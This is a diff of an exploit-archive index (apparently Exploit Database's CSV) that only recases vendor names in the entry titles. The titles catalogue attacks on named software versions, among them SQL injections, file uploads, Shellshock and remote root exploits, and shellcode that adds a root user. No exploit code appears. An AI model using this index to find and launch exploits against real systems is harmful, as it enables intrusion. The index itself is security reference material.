",php,webapps,0 -34353,platforms/php/webapps/34353.txt,"SnowFlake CMS 0.9.5 beta - 'uid' Parameter SQL Injection",2010-07-19,"Dinesh Arora",php,webapps,0 +34353,platforms/php/webapps/34353.txt,"SnowFlake CMS 0.9.5 Beta - 'uid' Parameter SQL Injection",2010-07-19,"Dinesh Arora",php,webapps,0 34354,platforms/php/webapps/34354.txt,"TenderSystem 0.9.5 - 'main.php' Multiple Local File Inclusion",2009-12-14,Packetdeath,php,webapps,0 34355,platforms/windows/dos/34355.txt,"Microsoft DirectX 8/9 DirectPlay - Multiple Denial Of Service Vulnerabilities",2010-07-18,"Luigi Auriemma",windows,dos,0 34356,platforms/linux/dos/34356.txt,"gif2png 2.5.2 - Remote Buffer Overflow",2009-12-12,"Razuel Akaharnath",linux,dos,0 @@ -31018,7 +31018,7 @@ id,file,description,date,author,platform,type,port 34432,platforms/php/webapps/34432.txt,"Wowd - 'index.html' Multiple Cross-Site Scripting Vulnerabilities",2009-10-29,Lostmon,php,webapps,0 34433,platforms/php/webapps/34433.txt,"Simple Directory Listing 2.1 - 'SDL2.php' Cross-Site Scripting",2010-10-22,"Amol Naik",php,webapps,0 34456,platforms/php/webapps/34456.txt,"JBoard - Multiple Cross-Site Scripting / SQL Injection",2009-08-31,Inj3ct0r,php,webapps,0 -34436,platforms/php/webapps/34436.txt,"WordPress ShortCode Plugin 0.2.3 - Local File Inclusion",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0 +34436,platforms/php/webapps/34436.txt,"Wordpress ShortCode Plugin 0.2.3 - Local File Inclusion",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0 34437,platforms/windows/remote/34437.txt,"Portable Document Format - Specification Signature Collision",2010-08-11,"Florian Zumbiehl",windows,remote,0 34438,platforms/php/webapps/34438.txt,"MybbCentral TagCloud 2.0 - 'Topic' Field HTML Injection",2010-08-11,3ethicalhackers.com,php,webapps,0 34439,platforms/multiple/remote/34439.txt,"ServletExec - (Directory Traversal / Authentication Bypass) Multiple Vulnerabilities",2010-08-12,"Stefano Di Paola",multiple,remote,0 @@ -31083,10 +31083,10 @@ id,file,description,date,author,platform,type,port 34507,platforms/linux/remote/34507.txt,"Nagios XI - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",linux,remote,0 34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 - 'register/next' SQL Injection",2010-08-23,Sweet,php,webapps,0 34510,platforms/linux/dos/34510.txt,"OraclMySQL 5.1.48 - 'LOAD DATA INFILE' Denial Of Service",2010-08-20,"Elena Stepanova",linux,dos,0 -34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes - (admin-ajax.php img parameter) Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 +34511,platforms/php/webapps/34511.txt,"Mulitple Wordpress Themes - (admin-ajax.php img parameter) Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 34512,platforms/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling SEH Buffer Overflow",2014-09-01,k3170makan,windows,local,0 34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Persistent Cross-Site Scripting",2014-09-01,"Prakhar Prasad",multiple,webapps,0 -34514,platforms/php/webapps/34514.txt,"WordPress Slideshow Gallery Plugin 1.4.6 - Arbitrary File Upload",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80 +34514,platforms/php/webapps/34514.txt,"Wordpress Slideshow Gallery Plugin 1.4.6 - Arbitrary File Upload",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80 34517,platforms/windows/remote/34517.rb,"Wing FTP Server - Authenticated Command Execution",2014-09-01,Metasploit,windows,remote,5466 34518,platforms/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",jsp,webapps,0 34519,platforms/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",jsp,webapps,8400 @@ -31095,7 +31095,7 @@ id,file,description,date,author,platform,type,port 34521,platforms/linux/dos/34521.txt,"Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial Of Service",2010-08-20,"Shane Bester",linux,dos,0 34522,platforms/linux/dos/34522.txt,"Oracle MySQL < 5.1.49 - 'DDL' Statements Denial Of Service",2010-07-09,"Elena Stepanova",linux,dos,0 34523,platforms/multiple/remote/34523.txt,"Nagios XI - 'users.php' SQL Injection",2010-08-24,"Adam Baldwin",multiple,remote,0 -34524,platforms/php/webapps/34524.txt,"WordPress Huge-IT Image Gallery 1.0.1 Plugin - Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80 +34524,platforms/php/webapps/34524.txt,"Wordpress Huge-IT Image Gallery 1.0.1 Plugin - Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80 34525,platforms/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python Exploit)",2014-09-02,"Dolev Farhi",multiple,webapps,0 34637,platforms/php/webapps/34637.txt,"Joomla Spider Form Maker 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",php,webapps,0 34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 - Multiple EXE Loading Arbitrary Code Execution",2010-08-25,storm,windows,remote,0 @@ -31107,7 +31107,7 @@ id,file,description,date,author,platform,type,port 34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 - Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 34536,platforms/php/webapps/34536.txt,"CompuCMS - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 34537,platforms/linux/local/34537.txt,"EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation Weaknesses",2010-08-26,"Micha Riser",linux,local,0 -34538,platforms/php/webapps/34538.txt,"WordPress Plugins Premium Gallery Manager - Unauthenticated Configuration Access",2014-09-05,Hannaichi,php,webapps,80 +34538,platforms/php/webapps/34538.txt,"Wordpress Plugins Premium Gallery Manager - Unauthenticated Configuration Access",2014-09-05,Hannaichi,php,webapps,80 34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Persistent Cross-Site Scripting",2014-09-05,"Fikri Fadzil",php,webapps,80 34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit (Python)",2014-09-05,"Robert Kugler",windows,dos,0 34541,platforms/php/webapps/34541.txt,"WebsiteKit Gbplus - Name and Body Fields HTML Injection Vulnerabilities",2010-08-29,MiND,php,webapps,0 @@ -31122,7 +31122,7 @@ id,file,description,date,author,platform,type,port 34550,platforms/php/webapps/34550.txt,"Datemill - search.php st Parameter Cross-Site Scripting",2009-09-10,Moudi,php,webapps,0 34551,platforms/php/webapps/34551.txt,"IP Board 3.x - Cross-Site Request Forgery Token hjiacking",2014-09-07,"Piotr S.",php,webapps,0 34552,platforms/php/webapps/34552.txt,"LoadedCommerce7 - Systemic Query Factory",2014-09-07,Breaking.Technology,php,webapps,0 -34553,platforms/php/webapps/34553.txt,"WordPress Like Dislike Counter 1.2.3 Plugin - SQL Injection",2014-09-07,Att4ck3r.ir,php,webapps,0 +34553,platforms/php/webapps/34553.txt,"Wordpress Like Dislike Counter 1.2.3 Plugin - SQL Injection",2014-09-07,Att4ck3r.ir,php,webapps,0 34555,platforms/php/webapps/34555.txt,"PhpOnlineChat 3.0 - Cross-Site Scripting",2014-09-07,"N0 Feel",php,webapps,0 34604,platforms/php/webapps/34604.php,"BlueCMS 1.6 - 'X-Forwarded-For' Header SQL Injection",2010-09-06,cnryan,php,webapps,0 34558,platforms/php/webapps/34558.txt,"Amiro.CMS 5.8.4.0 - Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 @@ -31133,21 +31133,21 @@ id,file,description,date,author,platform,type,port 34563,platforms/php/webapps/34563.txt,"OneCMS 2.6.1 - 'index.php' Cross-Site Scripting",2010-09-02,anT!-Tr0J4n,php,webapps,0 34564,platforms/php/webapps/34564.txt,"CMS WebManager-Pro - 'c.php' SQL Injection",2010-09-02,MustLive,php,webapps,0 34565,platforms/php/webapps/34565.txt,"NuSOAP 0.9.5 - 'nusoap.php' Cross-Site Scripting",2010-09-03,"Bogdan Calin",php,webapps,0 -34578,platforms/php/webapps/34578.txt,"WordPress Acento Theme - (view-pdf.php file parameter) Arbitrary File Download",2014-09-08,alieye,php,webapps,80 +34578,platforms/php/webapps/34578.txt,"Wordpress Acento Theme - (view-pdf.php file parameter) Arbitrary File Download",2014-09-08,alieye,php,webapps,80 34581,platforms/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 34571,platforms/php/webapps/34571.py,"Joomla Spider Calendar 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0 -34572,platforms/php/webapps/34572.txt,"WordPress Bulk Delete Users by Email Plugin 1.0 - Cross-Site Request Forgery",2014-09-08,"Fikri Fadzil",php,webapps,0 +34572,platforms/php/webapps/34572.txt,"Wordpress Bulk Delete Users by Email Plugin 1.0 - Cross-Site Request Forgery",2014-09-08,"Fikri Fadzil",php,webapps,0 34580,platforms/php/webapps/34580.txt,"phpMyFAQ 2.8.X - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 34579,platforms/php/webapps/34579.txt,"vBulletin 5.1.X - Persistent Cross-Site Scripting",2014-09-08,smash,php,webapps,80 34924,platforms/windows/webapps/34924.txt,"BMC Track-It! - Multiple Vulnerabilities",2014-10-09,"Pedro Ribeiro",windows,webapps,0 34582,platforms/php/webapps/34582.txt,"osCommerce 2.3.4 - Multiple vulnerabilities",2014-09-08,smash,php,webapps,80 -34583,platforms/hardware/webapps/34583.txt,"TP-LINK Model No. TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80 -34584,platforms/hardware/webapps/34584.txt,"TP-LINK Model No. TL-WR841N / TL-WR841ND - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80 +34583,platforms/hardware/webapps/34583.txt,"TP-Link Model No. TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80 +34584,platforms/hardware/webapps/34584.txt,"TP-Link Model No. TL-WR841N / TL-WR841ND - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80 34585,platforms/php/webapps/34585.txt,"Atmail Webmail 7.2 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,443 34586,platforms/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",php,webapps,80 34587,platforms/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,multiple,webapps,8090 34588,platforms/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilities",2014-09-09,jsass,aix,dos,0 -34589,platforms/php/webapps/34589.txt,"WordPress WP Support Plus Responsive Ticket System 2.0 Plugin - Multiple Vulnerabilities",2014-09-09,"Fikri Fadzil",php,webapps,0 +34589,platforms/php/webapps/34589.txt,"Wordpress WP Support Plus Responsive Ticket System 2.0 Plugin - Multiple Vulnerabilities",2014-09-09,"Fikri Fadzil",php,webapps,0 34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - Obfuscated Shellcode chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User _ALI_ & Execute /bin/bash (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0 34593,platforms/php/webapps/34593.txt,"Parallels Plesk Sitebuilder 9.5 - Multiple Vulnerabilities",2014-09-09,alieye,php,webapps,0 34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 - Remote Root Code Execution",2014-09-09,eF,linux,remote,80 @@ -31164,10 +31164,10 @@ id,file,description,date,author,platform,type,port 34607,platforms/php/webapps/34607.txt,"TBDev 2.0 - Remote File Inclusion / SQL Injection",2010-09-02,Inj3ct0r,php,webapps,0 34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 - 'index.php' Local File Inclusion",2010-09-06,"MiND C0re",php,webapps,0 34609,platforms/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0 -34610,platforms/php/webapps/34610.txt,"zenphoto 1.3 - zp-core/full-image.php a Parameter SQL Injection",2010-09-07,"Bogdan Calin",php,webapps,0 -34611,platforms/php/webapps/34611.txt,"Zenphoto 1.3 - zp-core/admin.php Multiple Parameter Cross-Site Scripting",2010-09-07,"Bogdan Calin",php,webapps,0 +34610,platforms/php/webapps/34610.txt,"ZenPhoto 1.3 - zp-core/full-image.php a Parameter SQL Injection",2010-09-07,"Bogdan Calin",php,webapps,0 +34611,platforms/php/webapps/34611.txt,"ZenPhoto 1.3 - zp-core/admin.php Multiple Parameter Cross-Site Scripting",2010-09-07,"Bogdan Calin",php,webapps,0 34805,platforms/php/webapps/34805.txt,"StatsCode - Multiple Cross-Site Scripting Vulnerabilities",2009-07-09,"599eme Man",php,webapps,0 -34806,platforms/php/webapps/34806.txt,"JNM Guestbook 3.0 - 'index.php' Cross-Site Scripting",2009-07-09,Moudi,php,webapps,0 +34806,platforms/php/webapps/34806.txt,"JNM GuestBook 3.0 - 'index.php' Cross-Site Scripting",2009-07-09,Moudi,php,webapps,0 34807,platforms/php/webapps/34807.txt,"JNM Solutions DB Top Sites 1.0 - 'vote.php' Cross-Site Scripting",2009-07-08,Moudi,php,webapps,0 34808,platforms/php/webapps/34808.txt,"Rapidsendit Clone Script - 'admin.php' Insecure Cookie Authentication Bypass",2009-07-08,NoGe,php,webapps,0 34614,platforms/asp/webapps/34614.txt,"SmarterTools SmarterStats 5.3.3819 - 'frmHelp.aspx' Cross-Site Scripting",2010-09-09,"David Hoyt",asp,webapps,0 @@ -31179,7 +31179,7 @@ id,file,description,date,author,platform,type,port 34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS - image.php image Parameter Cross-Site Scripting",2010-09-14,"Valentin Hoebel",php,webapps,0 34621,platforms/unix/remote/34621.c,"Mozilla Firefox 3.6.8 - 'Math.random()' Cross Domain Information Disclosure",2010-09-14,"Amit Klein",unix,remote,0 34622,platforms/windows/remote/34622.txt,"Axigen Webmail 1.0.1 - Directory Traversal",2010-09-15,"Bogdan Calin",windows,remote,0 -34751,platforms/hardware/webapps/34751.pl,"ZyXEL Prestig P-660HNU-T1 - ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80 +34751,platforms/hardware/webapps/34751.pl,"ZYXEL Prestig P-660HNU-T1 - ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80 34624,platforms/php/webapps/34624.txt,"OroCRM - Persistent Cross-Site Scripting",2014-09-11,Provensec,php,webapps,80 34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 - (index.php contacts_id parameter)SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion",2014-09-11,Vulnerability-Lab,ios,webapps,9900 @@ -31195,7 +31195,7 @@ id,file,description,date,author,platform,type,port 34636,platforms/php/webapps/34636.txt,"NWS-Classifieds - 'cmd' Parameter Local File Inclusion",2010-09-15,"John Leitch",php,webapps,0 34639,platforms/php/webapps/34639.txt,"CMScout IBrowser TinyMCE Plugin 2.3.4.3 - Local File Inclusion",2010-09-15,"John Leitch",php,webapps,0 34640,platforms/php/webapps/34640.txt,"Mollify 1.6 - 'index.php' Cross-Site Scripting",2010-09-15,"John Leitch",php,webapps,0 -34641,platforms/php/webapps/34641.py,"chillyCMS 2.3.4.3 - Arbitrary File Upload",2010-09-15,"John Leitch",php,webapps,0 +34641,platforms/php/webapps/34641.py,"ChillyCMS 2.3.4.3 - Arbitrary File Upload",2010-09-15,"John Leitch",php,webapps,0 34642,platforms/php/webapps/34642.txt,"AJ Auction Pro OOPD 3.0 - 'txtkeyword' Parameter Cross-Site Scripting",2009-08-06,"599eme Man",php,webapps,0 34643,platforms/php/webapps/34643.txt,"Silurus Classifieds - category.php ID Parameter Cross-Site Scripting",2009-08-06,Moudi,php,webapps,0 34644,platforms/php/webapps/34644.txt,"Silurus Classifieds - wcategory.php ID Parameter Cross-Site Scripting",2009-08-06,Moudi,php,webapps,0 @@ -31220,7 +31220,7 @@ id,file,description,date,author,platform,type,port 34663,platforms/php/webapps/34663.txt,"x10 MP3 Automatic Search Engine 1.6.5b - adult/video_listing.php key Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 34664,platforms/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution / File Include",2014-09-15,Vulnerability-Lab,ios,webapps,0 34666,platforms/php/webapps/34666.py,"ALCASAR 2.8.1 - Remote Root Code Execution",2014-09-15,eF,php,webapps,80 -34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Connect Back shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0 +34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Connect Back Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0 34668,platforms/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",windows,remote,80 34669,platforms/multiple/remote/34669.rb,"Railo - Remote File Inclusion",2014-09-15,Metasploit,multiple,remote,80 34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer - Arbitrary File Upload",2014-09-15,Metasploit,multiple,remote,8400 @@ -31234,7 +31234,7 @@ id,file,description,date,author,platform,type,port 34678,platforms/php/webapps/34678.txt,"WebStatCaffe - stat/pageviewerschart.php date Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 34679,platforms/php/webapps/34679.txt,"WebStatCaffe - stat/referer.php date Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 34680,platforms/hardware/webapps/34680.txt,"ZTE ZXDSL-931VII - Unauthenticated Configuration Dump",2014-09-16,"L0ukanik0-s S0kniaku0l",hardware,webapps,0 -34681,platforms/php/webapps/34681.txt,"WordPress Slideshow Gallery 1.4.6 Plugin - Arbitrary File Upload (Python)",2014-09-16,"Claudio Viviani",php,webapps,0 +34681,platforms/php/webapps/34681.txt,"Wordpress Slideshow Gallery 1.4.6 Plugin - Arbitrary File Upload (Python)",2014-09-16,"Claudio Viviani",php,webapps,0 34682,platforms/ios/webapps/34682.txt,"USB&WiFi Flash Drive 1.3 iOS - Code Execution",2014-09-16,Vulnerability-Lab,ios,webapps,8080 34685,platforms/windows/remote/34685.py,"Basic Web Server 1.0 - Directory Traversal / Denial of Service",2010-09-19,"John Leitch",windows,remote,0 34686,platforms/windows/remote/34686.txt,"YelloSoft Pinky 1.0 - Directory Traversal",2010-09-16,"John Leitch",windows,remote,0 @@ -31267,7 +31267,7 @@ id,file,description,date,author,platform,type,port 34713,platforms/php/webapps/34713.txt,"Freelancers - placebid.php id Parameter Cross-Site Scripting",2009-08-17,Moudi,php,webapps,0 34714,platforms/php/webapps/34714.txt,"Freelancers - post_resume.php jobid Parameter Cross-Site Scripting",2009-08-17,Moudi,php,webapps,0 34715,platforms/php/webapps/34715.txt,"AdQuick - 'account.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34803,platforms/php/webapps/34803.txt,"Online Guestbook Pro 5.1 - 'ogp_show.php' Cross-Site Scripting",2009-07-09,Moudi,php,webapps,0 +34803,platforms/php/webapps/34803.txt,"Online GuestBook Pro 5.1 - 'ogp_show.php' Cross-Site Scripting",2009-07-09,Moudi,php,webapps,0 34804,platforms/php/webapps/34804.txt,"Rentventory - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-07-07,"599eme Man",php,webapps,0 34717,platforms/php/webapps/34717.txt,"vBulletin 4.x Verify Email Before Registration Plugin - SQL Injection",2014-09-20,Dave,php,webapps,0 34718,platforms/php/webapps/34718.txt,"M/Monit 3.3.2 - Cross-Site Request Forgery",2014-09-20,"Dolev Farhi",php,webapps,0 @@ -31311,7 +31311,7 @@ id,file,description,date,author,platform,type,port 34759,platforms/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,php,webapps,80 34760,platforms/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting",2014-09-24,"Kenneth F. Belva",php,webapps,80 34761,platforms/php/webapps/34761.txt,"webEdition 6.3.8.0 (SVN-Revision: 6985) - Path Traversal",2014-09-24,"High-Tech Bridge SA",php,webapps,80 -34762,platforms/php/webapps/34762.txt,"WordPress Login Widget With Shortcode 3.1.1 Plugin - Multiple Vulnerabilities",2014-09-25,dxw,php,webapps,80 +34762,platforms/php/webapps/34762.txt,"Wordpress Login Widget With Shortcode 3.1.1 Plugin - Multiple Vulnerabilities",2014-09-25,dxw,php,webapps,80 34763,platforms/php/webapps/34763.txt,"OsClass 3.4.1 - (index.php file parameter) Local File Inclusion",2014-09-25,Netsparker,php,webapps,80 34764,platforms/php/webapps/34764.txt,"Cart Engine 3.0 - Multiple Vulnerabilities",2014-09-25,"Quantum Leap",php,webapps,80 34765,platforms/linux/remote/34765.txt,"GNU Bash - Environment Variable Command Injection (Shellshock)",2014-09-25,"Stephane Chazelas",linux,remote,0 @@ -31327,7 +31327,7 @@ id,file,description,date,author,platform,type,port 34775,platforms/php/webapps/34775.txt,"Hotscripts Type PHP Clone Script - 'index.php' msg Parameter Cross-Site Scripting",2009-08-21,Moudi,php,webapps,0 34776,platforms/php/webapps/34776.txt,"Hotscripts Type PHP Clone Script - lostpassword.php msg Parameter Cross-Site Scripting",2009-08-21,Moudi,php,webapps,0 34777,platforms/cgi/remote/34777.rb,"GNU Bash - Environment Variable Command Injection (Metasploit)",2014-09-25,"Shaun Colley",cgi,remote,0 -34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add map in /etc/hosts file (google.com 127.1.1.1) shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0 +34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add map in /etc/hosts file (google.com 127.1.1.1) Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0 34779,platforms/hardware/webapps/34779.pl,"Nucom ADSL ADSLR5000UN - ISP Credentials Disclosure",2014-09-25,"Sebastián Magof",hardware,webapps,80 34783,platforms/php/webapps/34783.txt,"Scriptsez Ultimate Poll - 'demo_page.php' Cross-Site Scripting",2009-07-16,Moudi,php,webapps,0 34784,platforms/php/webapps/34784.txt,"Micro CMS 1.0 - 'name' Field HTML Injection",2010-09-28,"Veerendra G.G",php,webapps,0 @@ -31345,7 +31345,7 @@ id,file,description,date,author,platform,type,port 34796,platforms/multiple/remote/34796.txt,"Oracle MySQL < 5.1.50 - Privilege Escalation",2010-08-03,"Libing Song",multiple,remote,0 34797,platforms/php/webapps/34797.txt,"SurgeMail SurgeWeb 4.3e - Cross-Site Scripting",2010-10-04,"Kerem Kocaer",php,webapps,0 34782,platforms/php/webapps/34782.txt,"NetArt Media Car Portal 2.0 - 'car' Parameter SQL Injection",2010-09-27,RoAd_KiLlEr,php,webapps,0 -34781,platforms/php/webapps/34781.txt,"WordPress All In One WP Security Plugin 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80 +34781,platforms/php/webapps/34781.txt,"Wordpress All In One WP Security Plugin 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80 34798,platforms/php/webapps/34798.txt,"ITS SCADA Username - SQL Injection",2010-10-04,"Eugene Salov",php,webapps,0 34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - File Include",2014-09-29,Vulnerability-Lab,ios,webapps,0 34800,platforms/php/webapps/34800.txt,"Typo3 JobControl 2.14.0 - Cross-Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",php,webapps,0 @@ -31360,9 +31360,9 @@ id,file,description,date,author,platform,type,port 34820,platforms/php/webapps/34820.pl,"Joomla Club Manager Component - 'cm_id' Parameter SQL Injection",2010-10-06,FL0RiX,php,webapps,0 34817,platforms/windows/webapps/34817.rb,"Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)",2014-09-29,"Nate Power",windows,webapps,0 34818,platforms/php/webapps/34818.html,"OpenFiler 2.99.1 - Cross-Site Request Forgery",2014-09-29,"Dolev Farhi",php,webapps,446 -34975,platforms/php/webapps/34975.txt,"SEO Tools Plugin for WordPress 3.0 - 'file' Parameter Directory Traversal",2010-11-08,"John Leitch",php,webapps,0 -34976,platforms/php/webapps/34976.txt,"WordPress Vodpod Video Gallery 3.1.5 Plugin - 'vodpod_gallery_thumbs.php' Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0 -34977,platforms/php/webapps/34977.txt,"WordPress jRSS Widget Plugin 1.1.1 - 'url' Parameter Information Disclosure",2010-11-08,"John Leitch",php,webapps,0 +34975,platforms/php/webapps/34975.txt,"SEO Tools Plugin for Wordpress 3.0 - 'file' Parameter Directory Traversal",2010-11-08,"John Leitch",php,webapps,0 +34976,platforms/php/webapps/34976.txt,"Wordpress Vodpod Video Gallery 3.1.5 Plugin - 'vodpod_gallery_thumbs.php' Cross-Site Scripting",2010-11-08,"John Leitch",php,webapps,0 +34977,platforms/php/webapps/34977.txt,"Wordpress jRSS Widget Plugin 1.1.1 - 'url' Parameter Information Disclosure",2010-11-08,"John Leitch",php,webapps,0 34827,platforms/php/webapps/34827.txt,"Recipe Script 5.0 - 'First Name' HTML Injection",2009-06-15,"ThE g0bL!N",php,webapps,0 34828,platforms/php/webapps/34828.txt,"Backbone Technology Expression 18.9.2010 - Cross-Site Scripting",2010-10-06,"High-Tech Bridge SA",php,webapps,0 34829,platforms/windows/remote/34829.c,"Adobe Dreamweaver CS4 - 'mfc80esn.dll' DLL Loading Arbitrary Code Execution",2010-10-10,Pepelux,windows,remote,0 @@ -31412,7 +31412,7 @@ id,file,description,date,author,platform,type,port 34874,platforms/php/webapps/34874.txt,"SkyBlueCanvas 1.1 r237 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,MaXe,php,webapps,0 34875,platforms/php/webapps/34875.txt,"QuarkMail - 'tf' Parameter Directory Traversal",2009-08-28,Securitylab.ir,php,webapps,0 34876,platforms/php/webapps/34876.txt,"E-Gold Game Series: Pirates of The Caribbean - Multiple SQL Injections",2009-08-27,Moudi,php,webapps,0 -34877,platforms/php/webapps/34877.txt,"DigiOz Guestbook 1.7.2 - 'search.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 +34877,platforms/php/webapps/34877.txt,"DigiOz GuestBook 1.7.2 - 'search.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0 34878,platforms/php/webapps/34878.txt,"StandAloneArcade 1.1 - 'gamelist.php' Cross-Site Scripting",2009-08-27,Moudi,php,webapps,0 34879,platforms/linux/remote/34879.txt,"OpenVPN 2.2.29 - Remote Exploit (Shellshock)",2014-10-04,"hobbily plunt",linux,remote,0 34881,platforms/linux/remote/34881.html,"Mozilla Firefox SeaMonkey 3.6.10 / Thunderbird 3.1.4 - 'document.write' Memory Corruption",2010-10-19,"Alexander Miller",linux,remote,0 @@ -31432,7 +31432,7 @@ id,file,description,date,author,platform,type,port 34895,platforms/cgi/webapps/34895.rb,"Bash CGI - Remote Code Execution Exploit (Shellshock) (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0 34896,platforms/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - Remote Exploit (Shellshock)",2014-10-06,"Phil Blank",linux,remote,0 34922,platforms/php/webapps/34922.txt,"Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 -35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0 +35023,platforms/php/webapps/35023.txt,"Wernhart GuestBook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0 35024,platforms/php/webapps/35024.txt,"Joomla Catalogue Component - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0 34900,platforms/linux/remote/34900.py,"Apache mod_cgi - Remote Exploit (Shellshock)",2014-10-06,"Federico Galatolo",linux,remote,0 34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles - /riddles/results.php searchquery Parameter Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0 @@ -31455,13 +31455,13 @@ id,file,description,date,author,platform,type,port 34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 - 'admin.php' Directory Traversal",2009-07-16,MaXe,php,webapps,0 34920,platforms/asp/webapps/34920.txt,"HttpCombiner ASP.NET - Remote File Disclosure",2014-10-07,"Le Ngoc Son",asp,webapps,0 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0 -34925,platforms/php/remote/34925.rb,"WordPress InfusionSoft Plugin - Upload",2014-10-09,Metasploit,php,remote,80 +34925,platforms/php/remote/34925.rb,"Wordpress InfusionSoft Plugin - Upload",2014-10-09,Metasploit,php,remote,80 34926,platforms/windows/remote/34926.rb,"Rejetto HttpFileServer - Remote Command 